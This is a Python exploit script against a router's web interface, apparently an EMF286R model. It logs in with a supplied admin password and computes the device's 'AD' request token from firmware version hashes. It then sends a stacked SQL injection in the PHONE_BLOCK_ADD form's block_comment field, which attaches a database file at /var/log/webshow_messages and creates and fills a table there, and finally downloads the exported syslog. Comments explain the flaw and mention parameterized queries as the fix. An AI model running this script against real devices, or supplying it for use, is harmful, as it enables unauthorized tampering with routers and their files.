exploit.py
import time
import requests
import hashlib
import sys
import base64
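# Firmware build identifiers that get_AD() hashes together with the RD value
# the router returns; presumably they must match the target firmware build.
wa_inner_version = "BD_POSTEMF286RMODULEV1.0.0B12"
cr_version = "CR_ITPOSTEMF286RV1.0.0B10"


def FORM(x):
    """Return a fresh form dict for a ``goformId`` request.

    Args:
        x: the ``goformId`` command name the router's web UI expects.

    Returns:
        A new dict ``{"isTest": False, "goformId": x}`` on every call, so
        callers can add fields without sharing state between requests.
    """
    # Was a lambda bound to a name (PEP 8 E731); a def is equivalent and
    # gives the helper a docstring and a usable traceback name.
    return {"isTest": False, "goformId": x}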
s = requests.Session()
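def login():
    """Authenticate the shared session ``s`` against the router's web UI.

    Posts a ``LOGIN`` form carrying the base64-encoded ``PASSWD`` global to
    ``goform_set_cmd_process`` with the ``HDRS`` headers and prints
    ``[+] Login: success`` or ``[+] Login: fail``. The router signals
    success with ``result == "0"`` in its JSON body.

    Returns:
        True when the router answered ``{"result": "0"}``, else False. The
        original only printed the outcome; returning it lets callers stop
        before issuing further requests on a failed login.

    Raises:
        ValueError: if the response body is not JSON.
    """
    data = FORM("LOGIN")
    data["password"] = PASSWD
    status = s.post(
        f"{HOST}/goform/goform_set_cmd_process",
        headers=HDRS,
        data=data,
    ).json()
    # .get(): a body without a "result" key counts as failure instead of
    # raising KeyError.
    ok = status.get("result") == "0"
    print("[+] Login: " + ("success" if ok else "fail"))
    return ok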
def get_AD():
    """Derive the ``AD`` value the router expects alongside form submissions.

    Steps:
      1. ``seed = md5(wa_inner_version + cr_version)`` (hex digest)
      2. fetch ``RD`` from ``goform_get_cmd_process?cmd=RD``, cache-busted
         with the current epoch seconds in the ``_`` parameter
      3. return ``md5(seed + RD)`` (hex digest)

    Note: the RD request goes through the module-level ``requests.get``,
    not the shared session ``s``, so no login cookie accompanies it; whether
    that is intentional cannot be told from this file.
    """

    def hexmd5(text):
        # Hex MD5 of the UTF-8 encoding of *text*.
        return hashlib.md5(text.encode("utf-8")).hexdigest()

    seed = hexmd5(wa_inner_version + cr_version)
    rd_url = (
        f"{HOST}/goform/goform_get_cmd_process"
        f"?isTest=false&cmd=RD&_={int(time.time())}"
    )
    rd_resp = requests.get(rd_url, headers=HDRS)
    return hexmd5(seed + rd_resp.json()["RD"])
def get_response(server_resp):
    """Print whether the router accepted the injection request.

    Args:
        server_resp: the HTTP response object from the POST; only its
            ``.text`` is inspected. The request counts as accepted when the
            body contains the substring ``"success"`` anywhere.

    Prints ``[+] payload injected: success`` or ``[+] payload injected: fail``
    and returns None.
    """
    outcome = "success" if "success" in server_resp.text else "fail"
    print(f"[+] payload injected: {outcome}")
def sqli():
    """Submit a PHONE_BLOCK_ADD form whose ``block_comment`` carries SQL.

    The value starts with ``test');`` which closes the quoted literal and
    terminates the statement the device builds around it, then runs further
    statements (``ATTACH DATABASE``, ``CREATE TABLE``, ``INSERT``) before
    ``--`` comments out the rest. That only works because the server
    concatenates the form field into its SQL text instead of binding it as a
    parameter; parameterized statements on the device side would neutralise
    it. The ``AD`` field is filled by get_AD(), presumably to pass a
    request-validation check. Uses the ``HOST``, ``HDRS`` and ``s`` globals.
    """
    # Path of the SQLite file the ATTACH statement creates/opens on the
    # device; presumably what get_log() later reads back via ExportSyslog.sh.
    target = "/var/log/webshow_messages"
    hostname_form = FORM("PHONE_BLOCK_ADD")
    hostname_form["block_number"] = "testestesttest"
    # Injected comment field (see docstring). A block_comment containing a
    # quote-and-terminator sequence like "');" or the keyword ATTACH DATABASE
    # is a straightforward indicator for request logging on the device side.
    hostname_form["block_comment"] = f"test'); ATTACH DATABASE '{target}' AS t; CREATE TABLE t.pwn (dataz text);INSERT INTO t.pwn (dataz) VALUES ('testestesttest');--"
    hostname_form["AD"] = get_AD()
    a = s.post(
        f"{HOST}/goform/goform_set_cmd_process",
        headers=HDRS,
        data=hostname_form,
    )
    get_response(a)
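def get_log():
    """Fetch the router's exported syslog and save it to ``last-log.txt``.

    GETs ``/cgi-bin/ExportSyslog.sh`` through the shared session ``s`` with
    the ``HDRS`` headers. A non-empty body is echoed to stdout and written to
    ``last-log.txt`` in the current working directory; an empty body produces
    no output and no file.
    """
    logs = s.get(f"{HOST}/cgi-bin/ExportSyslog.sh", headers=HDRS)
    if not logs.text:
        return
    print(logs.text)
    # Explicit UTF-8: with the platform default codec (e.g. cp1252 on
    # Windows) non-ASCII log text can raise UnicodeEncodeError, and the
    # file's encoding would otherwise depend on the host the script ran on.
    with open("last-log.txt", "w", encoding="utf-8") as logf:
        logf.write(logs.text)
    # Announce only after the write has actually happened.
    print("[+] Logs written into last-log.txt")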
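if __name__ == "__main__":
    # Usage: <this script> http://<router_ip> <admin_password>
    if len(sys.argv) < 3:
        # argv[0] rather than a hard-coded name, which did not match this file.
        print(f"usage: python3 {sys.argv[0]} http://<router_ip> <admin_password>")
        # Non-zero exit: a usage error must not look like success to a shell.
        sys.exit(1)
    HOST = sys.argv[1]
    # Browser-like headers; Origin/Referer point at the router itself.
    HDRS = {
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        "Origin": HOST,
        "Referer": f"{HOST}/index.html",
    }
    # The LOGIN form is sent the password base64-encoded (see login()).
    PASSWD = base64.b64encode(sys.argv[2].encode()).decode()
    login()  # prints the outcome; the script continues regardless
    sqli()
    get_log()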